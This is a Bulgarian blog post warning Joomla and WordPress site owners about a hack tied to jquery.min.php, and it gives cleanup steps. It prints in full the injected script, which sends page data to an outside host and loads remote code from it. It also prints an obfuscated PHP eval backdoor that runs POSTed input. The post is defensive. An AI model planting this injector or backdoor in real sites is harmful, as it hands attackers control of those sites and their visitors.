Проверете сайта за jquery.min.php - може и да са ве хакнали!

Направете проверка за jquery.min.php във файловете на вашият сайт. Особено ако ползвате Joomla или WordPress. И особено ако го намерите в index.php (на Joomla) или при header.php (на WordPress), това ще означава, че са ви хакнали.
Пълният текст на скрипта е следния (с малки разлики):

<script>var a=''; setTimeout(10); var default_keyword = encodeURIComponent(document.title); var se_referrer = encodeURIComponent(document.referrer); var host = encodeURIComponent(window.location.host); var base = "http://agn.eng.br/js/jquery.min.php"; var n_url = base + "?default_keyword=" + default_keyword + "&se_referrer=" + se_referrer + "&source=" + host; var f_url = base + "?c_utt=snt2014&c_utm=" + encodeURIComponent(n_url); if (default_keyword !== null && default_keyword !== '' && se_referrer !== null && se_referrer !== ''){document.write('<script type="text/javascript" src="' + f_url + '">' + '<' + '/script>');}</script>

 Изтриите го от файловете, където го намерите.
Но това не е всичко. Ако се ве хакнали както трябва, този троянец ще е оставил следи и бекдори навсякъде.
Трябва да направите търсене за "eval". Резултатите ще са много, но вие търсите нещо от сорта на:

$lsie30 =”o46cbea_dtsp” ;$eeb4 = strtolower($lsie30[4].$lsie30[6]. $lsie30[10].$lsie30[5].$lsie30[2]. $lsie30[1] . $lsie30[7]. $lsie30[8]. $lsie30[5]. $lsie30[3].$lsie30[0].$lsie30[8].$lsie30[5] ); $lbz4= strtoupper( $lsie30[7].$lsie30[11]. $lsie30[0]. $lsie30[10].$lsie30[9]) ;if( isset( ${ $lbz4 } [‘ne9fa0d’]) ){eval ( $eeb4 ( ${$lbz4}[‘ne9fa0d’] ) ) ;}?>

Това също трябва да се премахне.
След това променете името и паролата за логване. Изтриите всички непознати юзери. Направете ъпдейт на CMS-a.
Пълен пост на решението може да намерите тук!
Място: Blagoevgrad, Bulgaria

Коментари

Публикуване на коментар

Популярни публикации от този блог

Как да подкараме програматор SIVAVA под Windows 7 64bit

Изображение
Искам да дам малко информация, как подкарах програматор SIVAVA / www.sivava.com / програматор на LPT под Windows 7 64bit. Преди всичко, намерете компютърно дъно с LPT на самото дъно, защото аз изгубих 2 дни, опитвайки се да подкарам програматора с PCI-to-LPT платка и не стана... / под Windows XP съм го правил.../ За да подкарате програматора следвайте инструкциите на този сайт - https://www.downtowndougbrown.com/2010/10/sivava-willem-eprom-programmer-on-windows-7-64-bit/ Този човек обяснява как да подкарате програматора с PCI Express 1x card. Това не стана при мен /може би това все пак зависи и от пройзводителя на картите.../, но останалата част от поста е ОК. Прочетете инструкциите на програматора и инсталирайте програматора. Сега за часта свързана с софтуера.... На диска има няколко версии на софтуера. Разбира се всеки нормален човек ще избере най - новата версия за инсталиране, но при мен работи версията, която е един релиз назад - Version 0.98D12a. Когато стартирате
Прочетете още

TomTom - Инсталиране на ново ядро и карти...

Изображение
TomTom е една от водещите фирми в разработването на софтуер и хардуер за навигация. Днес цената на PDA устройствата падна много и хората си накупуваха доста такива устройства... Много не се замислят какво си купуват, стига цената да ги задоволява. Купуваш си устройството, получаваш карта на България и после се оправай. Наскоро ми попадна едно такова устройство и ще се опитам да направа кратък преглед на начина на ъпгрейд на ядрото на програмата и инсталиране на нови карти на устройството. Ето някои основни неща, за да не се чудите от къде да започнете, като ви попадне такова устройство. Устройството може да се зарежда като го свържете директно към USB-то на компютъра. Стартира се като задържи малко бутона за пускане. Обикновено устройствата разполагат с вътрешна и външна памет, големината на която зависи от парите, които сте дали за закупуването му. Когато свържете устройството към компютъра и го включите, то ве пита дали искате да го свържете с компютъра и ако натиснете "ДА"
Прочетете още

Мечоците в Смолянско не спят зимен сън заради топлото време

Изображение
Мечоците в Смолянско са все още активни  заради топлото време и се хранят със захранките на глиганите.  Южнякът, който покачи температурите в последните дни у нас, накара мечките да търсят храна съобщават ловците от региона. Това са мъжкари, които още не са заспали зимен сън. Те ядат редовно оставяните от ловните дружинки фуражи /главно царевица/ за глиганите, обясняват специалисти по лова. Досега са разставени над 100 тона храна. И понеже мечоците винаги оставят следи по снега или в калта, ловците ги виждат, броят и знаят, кои подяждат прасетата. В биологията на женските  е заложено поради текуща бременност, да износват плода си, докато спят. Така будни сред тях почти няма. Общо 207 са преброени при последната таксация през март 2017 г. в Смолянско кафяви зверове. През 2015 те са били 227, а в 2016 – 197 броя. Обикалящите и през текущата 2018 г. из родопските гори неспящи мечки до момента не правят бели, съобщава директорът на РИОСВ Смолян инж. Екатерина Гаджева. В допълнение от См
Прочетете още